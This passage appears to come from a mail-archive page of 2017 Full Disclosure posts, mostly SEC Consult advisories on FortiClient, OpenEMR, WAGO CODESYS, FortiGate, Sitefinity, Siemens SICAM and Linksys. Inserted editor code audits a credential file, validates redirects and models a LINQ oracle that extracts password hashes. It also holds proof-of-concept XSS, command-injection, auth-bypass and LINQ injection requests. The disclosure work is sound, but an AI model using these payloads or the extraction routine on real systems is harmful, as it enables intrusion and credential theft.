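An audit of the credential store described above, as an added example that is not SEC Consult's withheld tool and performs no decryption: it checks the file mode shown in the listing, reports which Enc-prefixed credential fields are present, and applies the interim owner-only chmod. The sample file is constructed from the dump above and written to a temporary directory.

```python
import os
import stat
import tempfile

# Fields the dump above shows holding "Enc <hex>" values.
CREDENTIAL_KEYS = ("passwordenc", "p12passwdenc")

# Constructed sample mirroring the .fctsslvpnhistory dump on the page.
SAMPLE_STORE = (
    "profile=demo\n"
    "p12passwdenc=Enc 420d2ee65abded897a69c50f4995397969f1c1f949055d8e51\n"
    "path=\n"
    "passwordenc=Enc 420d2ee65abded897a69c50f49956909f61e3e549873cdfecf12bafdfa7b78f789a17ba1a5a6c9eb1803\n"
    "user=li\n"
    "port=443\n"
    "server=server.com\n"
)


def parse_profile_lines(text):
    """Parse the key=value lines of the history file into a dict.

    Reader written for the format shown above; lines without '=' are skipped.
    """
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def audit_credential_store(path):
    """Return a list of findings for one stored-profile file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("group/other readable (mode %o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/other writable (mode %o)" % mode)
    with open(path, encoding="utf-8", errors="replace") as fh:
        fields = parse_profile_lines(fh.read())
    for key in CREDENTIAL_KEYS:
        value = fields.get(key, "")
        # "Enc" followed by hex means a credential was saved; a bare "Enc"
        # (or a missing key) means nothing is stored for that field.
        if value.startswith("Enc ") and len(value) > 4:
            findings.append(
                "stored credential in %s (profile=%s user=%s server=%s)"
                % (key, fields.get("profile", "?"), fields.get("user", "?"),
                   fields.get("server", "?"))
            )
    return findings


def restrict_mode(path):
    """Interim control until the fixed client is deployed: owner-only access.

    This does not remove the saved credential and does nothing about the
    hardcoded key; both still need the vendor patch.
    """
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def write_sample_store(directory):
    """Write the constructed sample with the -rw-rw-rw- mode from the listing."""
    path = os.path.join(directory, ".fctsslvpnhistory")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_STORE)
    os.chmod(path, 0o666)
    return path


def run_demo():
    """Audit the sample store before and after restricting its mode."""
    with tempfile.TemporaryDirectory() as directory:
        path = write_sample_store(directory)
        before = audit_credential_store(path)
        new_mode = restrict_mode(path)
        after = audit_credential_store(path)
    return before, new_mode, after


if __name__ == "__main__":
    before, new_mode, after = run_demo()
    print("before:", *before, sep="\n  ")
    print("after chmod %o:" % new_mode, *after, sep="\n  ")
```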


The advisory on our website also contains further detailed technical information
with screenshots:
https://www.sec-consult.com/en/blog/advisories/vpn-credentials-disclosure-in-fortinet-forticlient/index.html


Vulnerable / tested versions:
-
The vulnerabilities have been identified in version 4.4.2332 on Linux, version
5.6.0.1075 on Windows as well as version 5.6.0.703 on Mac OSX, which were the
latest versions of the product at the time of the audit to the best of our
knowledge.


Vendor contact timeline:

2017-08-30: Contacting vendor through ps...@fortinet.c

Re: [FD] Edward Snowden free speech at JBFone - Future, Data Security & Privacy

2017-12-05 Thread Vulnerability Lab
UPDATE

Reference(s):
http://www.focus.de/digital/handy/iphone/apple-edward-snowden-warnt-vor-iphone-x-besonders-eine-funktion-ist-gefaehrlich_id_7921720.html
http://www.chip.de/news/Beruehmtester-Hacker-der-Welt-warnt-Im-iPhone-X-steckt-eine-gefaehrliche-Funktion_128162181.html
http://www.t-online.de/digital/handy/id_82783158/iphone-x-edward-snowden-warnt-vor-apples-face-id.html
https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html
https://www.netzwelt.de/news/162899-edward-snowden-muenchen-vorsicht-face-id-iphone-x.html
http://www.augsburger-allgemeine.de/digital/Fehler-in-iOS-Apple-empfiehlt-Nutzern-ein-Update-auf-iOS-11-2-id42863076.html
https://www.derstandard.de/story/268413551/snowden-warnt-vor-dem-iphone-x
http://www.finanzen.net/nachricht/aktien/datenschutz-gefaehrliche-funktion-whistleblower-edward-snowden-warnt-vor-apples-supersmartphone-5835184
https://www.nzz.ch/digital/snowden-warnt-vor-gesichtserkennung-ld.1332209
http://winfuture.de/news,100724.html
http://www.chip.de/news/Beruehmtester-Hacker-der-Welt-warnt-Im-iPhone-X-steckt-eine-gefaehrliche-Funktion_128162181.html
http://www.silicon.de/41663743/iphone-x-snowden-kritisiert-freigabe-von-face-id-fuer-entwickler/?inf_by=5a1d649b681db8db1e8b49ee
http://www.zdnet.de/88319443/iphone-x-snowden-kritisiert-freigabe-von-face-id-fuer-entwickler/
https://curved.de/news/iphone-x-snowden-findet-face-id-freigabe-fuer-entwickler-unverantwortlich-552267
https://utopia.de/edward-snowden-iphone-x-datenschutz-71335/
https://www.appticker.de/news/smartphone-news/edward-snowden-face-id-fuer-entwickler-freizugeben-war-ein-fehler-7994.html
https://apfeleimer.de/2017/11/snowden-die-face-id-gehoert-nicht-in-entwicklerhaende-video
http://www.netz-trends.de/id/7896/Edward-Snowden-warnt-vor-Gesichtserkennungssoftware-im-iPhone-X/
http://www.giga.de/smartphones/iphone-x/news/iphone-x-deshalb-warnt-edward-snowden-vor-dem-apple-handy/
http://www.manager-magazin.de/unternehmen/it/iphone-x-edward-snowden-warnt-vor-face-id-a-1180482.html
http://www.connect.de/news/iphone-x-face-id-snowden-warnt-missbrauch-3197965.html
http://seclists.org/fulldisclosure/2017/Nov/38
https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy

#security #infosec #privacy #freespeech





[FD] SEC Consult SA-20171130-1 :: OS Command Injection & Reflected Cross Site Scripting in OpenEMR

2017-12-02 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20171130-1 >
===
  title: OS Command Injection & Reflected Cross Site Scripting
product: OpenEMR
 vulnerable version: 5.0.0
  fixed version: 5.0.0 Patch 2 or higher
 CVE number: -
 impact: Critical
   homepage: http://www.open-emr.org/
  found: 2017-03-03
 by: Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"OpenEMR is the most popular open source electronic health records and medical
practice management solution. ONC certified with international usage,
OpenEMR's goal is a superior alternative to its proprietary counterparts."

Source: http://www.open-emr.org/


Business recommendation:

By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise the web server which has OpenEMR installed. Potentially
sensitive health care and medical data might get exposed through this attack.

SEC Consult recommends not to attach OpenEMR to the network until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
---
1. OS Command Injection
Any OS commands can be injected by an authenticated attacker with any role.
This is a serious vulnerability as the chance for the system to be fully
compromised is very high.

2. Reflected Cross Site Scripting
This vulnerability allows an attacker to inject malicious client side
scripting which will be executed in the browser of users if they visit the
manipulated site. There are different issues affecting various components.
The flash component has not been fixed yet as OpenEMR is looking for a
replacement component.


Proof of concept:
-
1. OS Command Injection
Below are the details of an HTTP request that needs to be sent to execute
arbitrary OS commands through "fax_dispatch.php".

URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x
METHOD  : POST
PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_filename=''&form_pid=1


2. Reflected Cross Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross site scripting:

The following payload shows a simple alert message box:
a)
URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swf
METHOD  : GET
PAYLOAD : [PoC removed as no fix is available]

b)
URL :
http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php
METHOD  : POST
PAYLOAD : alert('xss');=SENDF


Vulnerable / tested versions:
-
OpenEMR version 5.0.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.


Vendor contact timeline:

2017-03-08: Contacting vendor through email.
2017-03-08: Vendor replied with his public key. Advisory sent through secure
channel.
2017-03-17: Asked for a status update from the vendor.
2017-03-17: Vendor confirms the vulnerabilities and is working on the fixes.
2017-03-31: Asked for a status update from the vendor.
2017-03-31: Vendor informed that they have fixed OS Command Injection and are
currently working on fixes for Reflected Cross Site Scripting.
2017-04-25: Vendor requesting extension for deadline of 32 days from the
latest possible release date.
2017-05-25: Asked for a status update from the vendor.
2017-05-29: Vendor informed that they are working on the fixes.
2017-06-06: Asked for a status update from the vendor.
2017-06-12: Vendor informed that they added solution into the development
codebase.
2017-07-05: Asked for a status update from the vendor.
2017-07-10: Vendor informed that the patch is delayed due to other critical
bug fixes.
2017-08-17: Asked for a status update from the vendor. No reply.
2017-08-24: Asked for a status update from the vendor.
2017-08-29: Vendor informed patch will be out soon.
2017-08-30: Asked vendor for specific release date for patch. No reply.
2017-09-08: Asked for a status update from the vendor. No reply.
2017-09-14: Asked for a status update from the vendor.
2017-09-18: Vendor informed that they are testing their patch. No estimation
  

[FD] SEC Consult SA-20171130-0 :: Critical CODESYS vulnerabilities in WAGO PFC 200 Series

2017-12-02 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20171130-0 >
===
  title: Critical CODESYS vulnerabilities
product: WAGO PFC 200 Series, see "Vulnerable / tested versions"
 vulnerable version: plclinux_rt 2.4.7.0, see "Vulnerable / tested versions"
  fixed version: PFC200 FW11
 CVE number: -
 impact: critical
   homepage: https://www.codesys.com
  found: 2017-07-28
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"The WAGO-I/O-SYSTEM is a flexible fieldbus-independent solution for
decentralized automation tasks. With the relay, function and interface
modules, as well as overvoltage protection, WAGO provides a suitable interface
for any application."

Source: http://global.wago.com/en/products/product-catalog/components-automation/overview/index.jsp

"The PFC family of controllers offers advanced compact, computing power for PLC
programming and process visualization. Programmable in accordance with IEC 61131-3
600, PFC controllers feature a 600 MHz ARM Cortex A8 processor that offers high
speed processing and support of 64 bit variables."

Source:
http://www.wago.us/products/components-for-automation/modular-io-system-series-750-753/programmable-fieldbus-controller/pfc200/index.jsp



Business recommendation:

Because of the use in industrial and safety-critical environments the patch has
to be applied as soon as it is available. We explicitly point out to all users
in this sector that devices of the mentioned series with firmware
02.07.07(10) should not be connected directly to the internet (or even act as
gateway) since it is very likely that an attacker can compromise the whole
network via such a device.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals.


Vulnerability overview/description:
---
The "plclinux_rt" service accepts different unauthenticated actions.

This vulnerability contains the architectural security problems described by
Reid Wightman. The SDK of "plclinux_rt" is written by the same vendor (3S).
Therefore, the file commands of "Digital Bond's 3S CODESYS Tools", created
around 2012 are applicable.
(See https://ics-cert.us-cert.gov/advisories/ICSA-13-011-01)

The CODESYS command-line is protected with login credentials, which is why the
shell of the mentioned tools does not provide root access out of the box. But
after some investigation it was clear that there are further functions which
are reachable without using the command-line and without any authentication.

These functions in "plclinux_rt" can be triggered by sending the correct
TCP payload on the bound port (by default 2455).

Some of the triggerable functions are:
* Arbitrary file read/write/delete (also covered by "Digital Bond's Tools")
* Step over a function in the currently executed PLC program
* Cycle step any function in the currently executed PLC program
* Delete the current variable list of the currently executed PLC program
* And more functions...

Since SSH is activated by default, an unauthenticated attacker can rewrite
"/etc/shadow" and gain root privileges easily via these attack vectors!


1) Critical Improper Authentication / Design Issue
Files can be fetched, written and deleted. Running tasks on the PLC can be
restarted, stepped and crashed.

An attacker can therefore replace the password hash in the shadow file. A
memory corruption (and potential reverse-shell) is also possible via arbitrary
TCP packets.

There are potentially more commands which can be triggered, but this was not
covered by the short security crash test.


Proof of concept:
-
As there is no patch available yet, the detailed proof of concept information
has been removed from this advisory.

1) Critical Improper Authentication / Design Issue
Two payloads are specified here as proof of concept for file manipulation.
Four payloads for live program manipulation are also listed.

File read and delete without any authentication.

Read "/etc/shadow":
echo '[PoC removed]' | xxd -r -p | nc  

Delete "/etc/test":
echo '[PoC removed]' | xxd -r -p | nc  

Running PLC tasks could be modified with the following payloads:

Step over functi

[FD] SEC Consult SA-20171129-0 :: FortiGate SSL VPN Portal XSS Vulnerability

2017-12-02 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171129-0 >
===
  title: FortiGate SSL VPN Portal XSS Vulnerability
product: Fortinet FortiOS
 vulnerable version: see: Vulnerable / tested versions
  fixed version: see: Solution
 CVE number: CVE-2017-14186
 impact: Medium
   homepage: https://www.fortinet.com
  found: 2017-10-02
 by: Stefan Viehböck (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Vulnerability overview/description:
---
The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS)
vulnerability. The HTTP GET parameter "redir" is vulnerable.
An attacker can exploit this vulnerability by tricking a victim into visiting a
URL. The attacker is able to hijack the session of the attacked user, and use
this vulnerability in the course of spear-phishing attacks, e.g. by displaying a
login prompt that sends the victim's credentials back to the attacker.

Note: This vulnerability is also an open redirect and is very similar to a
vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004).
https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability


Proof of concept:
-
The following request exploits the issue:
https://vpn..com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location)


The server responds with a page that looks as follows:
---


document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29");


---
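The server-side validation this "redir" handling calls for, as an added example that is not Fortinet's code: the parameter is decoded in the browser before it is assigned to document.location, so the check runs on the fully decoded value, only paths on the portal's own host survive, and the value written into the inline script is encoded for a JavaScript string literal. The host name and default landing path are assumptions.

```python
import json
from urllib.parse import unquote, urlsplit

DEFAULT_TARGET = "/remote/index"  # assumed landing page when redir is rejected


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so a
    double-encoded "javascript%253A" is judged as "javascript:"."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(raw, allowed_host, default=DEFAULT_TARGET):
    """Return a redirect target that can only land on allowed_host.

    The portal page decodes the parameter in the browser before assigning it
    to document.location, so validation has to run on the decoded form.
    """
    if raw is None:
        return default
    value = fully_decode(raw)
    # Drop control characters (tab, newline, ...) that browsers ignore inside
    # a scheme, so "java\tscript:" is seen as "javascript:".
    value = "".join(ch for ch in value if ord(ch) >= 0x20 and ord(ch) != 0x7F).strip()
    if not value:
        return default
    parts = urlsplit(value)  # urlsplit lowercases the scheme
    if parts.scheme:
        # Any scheme other than https, or any other host, is refused. This
        # covers javascript:, data:, vbscript: and plain open redirects.
        if parts.scheme != "https" or parts.netloc.lower() != allowed_host.lower():
            return default
        path = parts.path or "/"
    else:
        if parts.netloc:  # "//evil.example/..." protocol-relative form
            return default
        path = parts.path
        # Must be an absolute path on this host; "//" and "/\" would be read
        # by browsers as the start of a new authority.
        if not path.startswith("/") or path.startswith(("//", "/\\")):
            return default
    target = path
    if parts.query:
        target += "?" + parts.query
    return target  # any fragment is dropped


def render_redirect_script(target):
    """Emit the inline assignment the portal uses, with the value encoded as a
    JavaScript string literal and <, >, & escaped so it cannot close the
    surrounding <script> element."""
    literal = json.dumps(target)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return "document.location=%s;" % literal


if __name__ == "__main__":
    host = "vpn.example.com"
    for redir in ("javascript:alert(%22XSS%20%22%2Bdocument.location)",
                  "java%09script:alert(1)", "//evil.example/", "/\\evil.example",
                  "/remote/portal?x=1#frag", "https://vpn.example.com/remote/portal",
                  "https://evil.example/"):
        print("%-55s -> %s" % (redir, render_redirect_script(
            safe_redirect_target(redir, host))))
```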


Vulnerable / tested versions:
-
FortiOS 5.6.0 -> 5.6.2
FortiOS 5.4.0 -> 5.4.6
FortiOS 5.2.0 -> 5.2.12
FortiOS 5.0 and below

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Vendor contact timeline:

2017-10-02: Contacting vendor through ps...@fortinet.com
2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix
in version 5.6.3
2017-11-23: Vendor provides update
2017-11-29: Coordinated public release of advisory


Solution:
-
FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th)
FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA:
Dec 7th)
FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA:
Dec 14th)

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242


Workaround:
---
Not available.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices http

[FD] Edward Snowden free speech at JBFone - Future, Data Security & Privacy

2017-11-23 Thread Vulnerability Lab
Title: Edward Snowden free speech at JBFone - Future, Data Security &
Privacy

Article:
https://www.vulnerability-db.com/?q=articles%2F2017%2F11%2F23%2Fedward-snowden-free-speech-jbfone-data-security-privacy

Video: https://www.youtube.com/watch?v=JF45xq0W15c

Press:
https://www.heise.de/newsticker/meldung/Snowden-warnt-vor-Big-Data-Biometrie-und-dem-iPhone-X-3899649.html

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] SEC Consult SA-20171116-0 :: Broken access control & LINQ injection in Progress Sitefinity

2017-11-16 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171116-0 >
===
  title: Broken access control & LINQ injection
product: Progress Sitefinity
 vulnerable version: 10.0, 10.1
  fixed version: >=10.1.6527.0 (internal build), 10.2
 CVE number: -
 impact: High
   homepage: http://www.sitefinity.com | https://www.progress.com
  found: 2017-08-21
 by: M. Li (Office Singapore)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===


Vendor description:
---
"Progress Sitefinity is a content management and marketing analytics
platform designed to maximize the agility needed to succeed in today’s rapidly
changing digital marketplace.
It provides developers and IT teams the tools they need to support
enterprise-level digital marketing, optimizing the customer journey by
delivering seamless personalized experiences across different technologies and
devices. Progress is a trusted source for the digital marketing innovation
needed to create transformative customer experiences that fuel business
success."

Source: http://www.sitefinity.com/about


Business recommendation:

SEC Consult recommends applying the provided patches by the vendor immediately.

Additionally, there are strong indications for further vulnerabilities and it
is highly suggested to perform a thorough security review by security
professionals to lower the risk of using this product.


Vulnerability overview/description:
---
1) Broken Access Control
By using an unprotected function, a low privileged user can extract another
user's information such as email addresses, user ID, etc.


2) LINQ Injection
The identified LINQ injection enables an authenticated user to read sensitive
data from the database. Specifically, an attacker can query the password
or its hash character by character. Depending on the version of LINQ assembly
in use, remote code execution could be possible as well.

Combining the two issues, a user could escalate her privileges.


Proof of concept:
-
1) Broken Access Control
A user with a low privileged role, e.g. "BackendUsers", can obtain other users'
information including email address, user ID etc., which is not intended for a
user with this role. The function disclosing the information is
"GenericItemsService.svc", located under the "Common" path, which is in general
not protected by role.

GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser
HTTP/1.1
Host: [host]
...snip...

HTTP/1.1 200 OK
...snip...
{
"Context":null,
"IsGeneric":false,
"Items":[
...snip...
{
...snip...
"Email":"te...@local.host",
...snip...

],
"UserID":"cb21e9a9-992c-4f8f-9800-b03c9639b02a"
}
],
"TotalCount":3
}


2) LINQ Injection
The aforementioned function "GenericItemsService.svc", which can be invoked by
any authenticated user regardless of her privileges, accepts the additional
parameter "filter" to narrow down the user list. This parameter does not
undergo any sanitization, hence properties like "password" can be queried
character by character.

For instance, the request in example 1 asks the server whether any user has a
password containing "2klv". Upon a correct guess, the reply contains the
matching users' attributes. By sending multiple such queries, an attacker can
deduce a user's password hash, salt, etc. The function "Users.svc" used in
example 2 can only be used by users with administrator privileges.

It could also be possible to extract the password in cleartext, if the default
setting for membership format is changed.

Furthermore, depending on the third party assembly System.Linq, the issue
could be abused to execute code on the server.


Example 1:
GET
/Sitefinity/Services/Common/GenericItemsService.svc/?itemType=Telerik.Sitefinity.Security.Model.User&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser&filter=(password.ToUpper().Contains(%222klv%22.ToUpper()))
HTTP/1.1

Example 2:
GET
/Sitefinity/Services/Security/Users.svc/?roleId=&roleProvider=&forAllProviders=false&filter=(salt.ToUpper().Contains(%225
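
Worked example (added by the editor; not part of the SEC Consult advisory and
not Sitefinity code): a Python model of the yes/no oracle that the "filter"
parameter creates. The user row, the simplified filter grammar (only the
Contains() shape from Example 1) and the allowed-property set are assumptions
made for this demonstration. extract() shows that Contains() answers alone are
enough to recover a stored value, and generic_items_service() with
allowed_properties shows the property allow-list the service lacked.

```python
import re
from urllib.parse import quote

# Constructed sample row standing in for a Telerik.Sitefinity.Security.Model.User
# (hypothetical values; the short "hash" keeps the demonstration quick).
USERS = [
    {"Email": "test@local.host",
     "UserID": "cb21e9a9-992c-4f8f-9800-b03c9639b02a",
     "Password": "x9a2klv7Qf",
     "Salt": "s4lt"},
]

# The only filter shape this model understands, the one used in Example 1:
#   (<property>.ToUpper().Contains("<value>".ToUpper()))
FILTER_RE = re.compile(
    r'^\((\w+)\.ToUpper\(\)\.Contains\("([^"]*)"\.ToUpper\(\)\)\)$')


def build_filter(prop, needle):
    return '(%s.ToUpper().Contains("%s".ToUpper()))' % (prop, needle)


def request_path(prop, needle):
    """GET path an attacker would send (compare Example 1 in the advisory)."""
    return ("/Sitefinity/Services/Common/GenericItemsService.svc/"
            "?itemType=Telerik.Sitefinity.Security.Model.User"
            "&itemSurrogateType=Telerik.Sitefinity.Security.Web.Services.WcfMembershipUser"
            "&filter=" + quote(build_filter(prop, needle), safe="()"))


def generic_items_service(filter_expr, allowed_properties=None):
    """Model of GenericItemsService.svc. With allowed_properties=None it behaves
    like the vulnerable service: whatever property the filter names is queried,
    Password and Salt included. Passing an allow-list is the missing check."""
    m = FILTER_RE.match(filter_expr)
    if not m:
        raise ValueError("unsupported filter expression")
    prop, needle = m.group(1), m.group(2)
    if allowed_properties is not None and prop.lower() not in allowed_properties:
        raise ValueError("filtering on %r is not permitted" % prop)
    items = []
    for user in USERS:
        # property names are matched case-insensitively, as "password" in the PoC
        value = next((v for k, v in user.items() if k.lower() == prop.lower()), "")
        if needle.upper() in value.upper():
            items.append({"Email": user["Email"], "UserID": user["UserID"]})
    return {"Items": items, "TotalCount": len(items)}


def oracle(prop, needle):
    """One yes/no question. Live, this is 'TotalCount > 0' in the JSON reply to
    request_path(prop, needle); here the model answers directly."""
    return generic_items_service(build_filter(prop, needle))["TotalCount"] > 0


def extract(prop, alphabet="ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"):
    """Recover the case-folded value of `prop` from Contains() answers only.
    `known` is always a genuine substring of the target; while it is a proper
    substring it can be extended by one character on the right or on the left,
    so when neither extension is accepted, `known` is the whole value."""
    known = ""
    while True:
        candidates = [known + c for c in alphabet] + [c + known for c in alphabet]
        for cand in candidates:
            if oracle(prop, cand):
                known = cand
                break
        else:
            return known


if __name__ == "__main__":
    print(request_path("password", "2klv"))
    print("recovered password hash:", extract("password"))
    print("recovered salt:", extract("salt"))
```

Because both sides are ToUpper()'d, the oracle only yields the case-folded
value; for hex-encoded hashes that is the complete hash, otherwise the case of
each letter still has to be brute-forced offline against the recovered salt.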

[FD] SEC Consult SA-20171114-0 :: Authentication bypass, cross-site scripting & code execution in Siemens SICAM RTUs SM-2556 COM Modules

2017-11-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171114-0 >
===
  title: Authentication bypass, cross-site scripting & code
 execution
product: Siemens SICAM RTUs SM-2556 COM Modules
 (firmware variants ENOS00, ERAC00, ETA2, ETLS00,
 MODi00 and DNPi00)
 vulnerable version: FW 1549 Revision 07
  fixed version: none, see Workaround section below
 CVE number: CVE-2017-12737 (authentication bypass)
 CVE-2017-12738 (XSS)
 CVE-2017-12739 (web server)
 impact: critical
   homepage: www.siemens.com
  found: 2017-08-17
 by: SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Siemens is a global powerhouse focusing on the areas of electrification,
automation and digitalization. One of the world's largest producers of
energy-efficient, resource-saving technologies, Siemens is a leading supplier
of systems for power generation and transmission as well as medical diagnosis."

Source: https://www.siemens.com/global/en/home/company/about.html


Business recommendation:

SEC Consult recommends not to use this device in production until a thorough
security review has been performed by security professionals and all
identified issues have been resolved. The device must not be accessible from
untrusted networks.


Vulnerability overview/description:
---
1) Authentication Bypass (client-side "authentication" enforcement)
The web interface (TCP port 80) suffers from an authentication bypass
vulnerability that allows unauthenticated attackers to access arbitrary
functionality and information (e.g. password lists) available through
the webserver.


2) Reflected Cross-Site Scripting
The web interface provides a "ping" functionality. This form is
vulnerable to reflected cross-site-scripting because of missing input
handling and output encoding.


3) Outdated Webserver (GoAhead)
The used webserver version contains known weaknesses.


Proof of concept:
-
1) Authentication Bypass
Use a browser which has JavaScript disabled ("authentication" checks are
performed client-side) and open legitimate URLs directly.

Examples:
http:///start.asp
http:///pwliste.asp
http:///goform/webforms_readmem?start_addr=0&length=100


2) Reflected Cross-Site Scripting
All parameters in "webforms_ping" are vulnerable to reflected XSS:
http:///goform/webforms_ping?ip_address=1.1.1.com%3Cscript%3Ealert(%27XSS%20proof-of-concept%27)%3C/script%3E1&length_data=32&count_pings=4&timeout=1


3) Outdated Webserver
The used version of the "GoAhead" webserver is 2.1.7 (released in Oct. 2003).
This version has known vulnerabilities:

http://aluigi.altervista.org/adv/goahead-adv3.txt
https://web.archive.org/web/20080314153252/http:/data.goahead.com:80/Software/Webserver/2.1.8/release.htm#bug-with-urls-like-asp



Vulnerable / tested versions:
-
SM-2556 COM Modules with the firmware variants ENOS00, ERAC00,
ETA2, ETLS00, MODi00 and DNPi00
(FW 1549 Revision 07)


Vendor contact timeline:

2017-09-25: Encrypted advisory sent to Siemens ProductCERT
2017-10-02: Requesting status update.
2017-10-09: Vendor states that the "affected device is out of service"
and provides workaround (disable webserver). They are
"still assessing the next steps".
2017-11-02: Requesting status update.
2017-11-06: Siemens ProductCERT will reach out to development team and keep us
posted.
2017-11-08: Siemens ProductCERT prepares advisory.
2017-11-08: Asking about planned release date.
2017-11-13: Siemens ProductCERT provides planned release date (2017-11-14)
2017-11-14: Coordinated public release.


Solution:
-
No firmware update is available as the device is no longer supported by
the vendor.


Workaround:
---
According to the vendor the webserver can be disabled to mitigate all
the vulnerabilities documented in this advisory.
The webserver is optional and only used for commissioning and debugging
purposes.

The vendor published the following document for further information:
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-164516.pdf


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~

[FD] SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products

2017-10-18 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
===
  title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
 vulnerable version: see "Vulnerable / tested versions"
  fixed version: no public fix, see solution/timeline
 CVE number: -
 impact: high
   homepage: http://www.linksys.com/
  found: 2017-06-26
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
